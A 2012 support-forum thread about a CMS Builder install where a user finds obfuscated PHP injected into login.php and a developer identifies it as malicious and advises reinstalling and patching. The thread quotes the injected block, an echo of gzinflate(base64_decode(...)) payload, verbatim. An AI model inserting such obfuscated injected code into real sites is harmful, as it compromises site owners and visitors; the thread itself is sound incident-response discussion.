Issue with Login
2 posts by 2 authors in: Forums > CMS Builder
Last Post: March 15, 2012 (RSS)
By KCMedia - March 15, 2012
Hi
i had 2 clients email me today saying that they couldnt login to their cmsb installs this is errors they where displaying
Parse error: syntax error, unexpected T_ECHO in /home/abbasbac/public_html/cmsAdmin/lib/menus/login.php on line 3
So i looked at the login.php file and i found this funny code at the top of the page what do you think about this.
I also found the same line of code in some other files also.
<?php include "header.php"
#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#
?>
i had 2 clients email me today saying that they couldnt login to their cmsb installs this is errors they where displaying
Parse error: syntax error, unexpected T_ECHO in /home/abbasbac/public_html/cmsAdmin/lib/menus/login.php on line 3
So i looked at the login.php file and i found this funny code at the top of the page what do you think about this.
I also found the same line of code in some other files also.
<?php include "header.php"
#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#
?>
Thanks
Craig
KC Media Solutions
www.kcmedia.biz
Craig
KC Media Solutions
www.kcmedia.biz
Re: [kcmedia] Issue with Login
By Dave - March 15, 2012
Hi Craig,
That looks like some malicious hacker code.
I would recommend either re-uploading the CMSB files or upgrading CMSB - either will replace the files with known good copies. Then check over any other PHP files on your website for vulnerabilities.
We've seen this a number of times and CMSB is never the entry point. Typically hackers get in by using automated scanners that look for security exploits in old versions of common open source software like wordpress, email forms, gallery scripts, etc. If you have anything like that check the versions and upgrade if needed, or just remove them if the software isn't needed anymore.
Also: Can you zip up that file and send it to me? I'm working on an automated security scanner for a future version of CMSB.
Let me know if you have any questions.
That looks like some malicious hacker code.
I would recommend either re-uploading the CMSB files or upgrading CMSB - either will replace the files with known good copies. Then check over any other PHP files on your website for vulnerabilities.
We've seen this a number of times and CMSB is never the entry point. Typically hackers get in by using automated scanners that look for security exploits in old versions of common open source software like wordpress, email forms, gallery scripts, etc. If you have anything like that check the versions and upgrade if needed, or just remove them if the software isn't needed anymore.
Also: Can you zip up that file and send it to me? I'm working on an automated security scanner for a future version of CMSB.
Let me know if you have any questions.
Dave Edis - Senior Developer
interactivetools.com
interactivetools.com